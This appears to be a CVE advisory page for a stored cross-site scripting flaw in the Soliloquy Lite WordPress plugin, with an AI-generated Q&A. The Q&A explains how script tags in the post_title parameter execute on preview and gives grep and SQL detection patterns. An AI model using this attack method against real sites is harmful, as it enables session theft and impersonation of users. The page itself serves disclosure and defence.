CVE-2019-25743
Persistent XSS in WordPress Soliloquy Lite Plugin
Publication date: 2026-06-04
Last updated on: 2026-06-04
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| soliloquy | soliloquy_lite | 2.5.6 |
| soliloquywp | soliloquy_lite | 2.5.6 |
| soliloquywp | soliloquy_lite | to 2.5.6 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of the WordPress Soliloquy Lite 2.5.6 persistent cross-site scripting vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
CVE-2019-25743 is a persistent cross-site scripting (XSS) vulnerability in WordPress Soliloquy Lite version 2.5.6. It allows authenticated attackers to inject malicious scripts by inserting script tags into the post title field. Attackers submit POST requests to the post editing endpoint with a script payload in the post_title parameter. This payload is stored and later executed when users preview the affected post.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to execute malicious scripts in the context of your website when users preview posts. This can lead to unauthorized actions such as stealing user session data, defacing content, or performing actions on behalf of users without their consent. Since the attack requires authentication, it could be exploited by users with limited privileges to escalate their impact.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking for the presence of malicious script tags in the post title fields of posts created or edited using the Soliloquy Lite plugin version 2.5.6 or earlier.
One approach is to monitor POST requests to the post editing endpoint and inspect the post_title parameter for suspicious script payloads.
For example, you can use web server logs or network monitoring tools to filter POST requests containing <script> tags in the post_title parameter.
A sample command using grep on web server logs might be:
- grep -i 'post_title=.*<script' /path/to/access.log
Additionally, within WordPress, you can audit posts with suspicious titles by running a database query to find titles containing script tags.
- SELECT ID, post_title FROM wp_posts WHERE post_title LIKE '%<script>%';
These methods help identify if malicious scripts have been injected via the vulnerable parameter.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately update the Soliloquy Lite plugin to a version later than 2.5.6 where the issue is fixed.
If an update is not immediately possible, restrict access to the post editing endpoint to trusted authenticated users only, as the vulnerability requires authentication.
Additionally, review and sanitize post titles to remove any injected script tags or suspicious content.
Consider disabling the preview functionality temporarily to prevent execution of stored malicious scripts.
Monitor logs for suspicious POST requests containing script tags in the post_title parameter and remove any malicious posts found.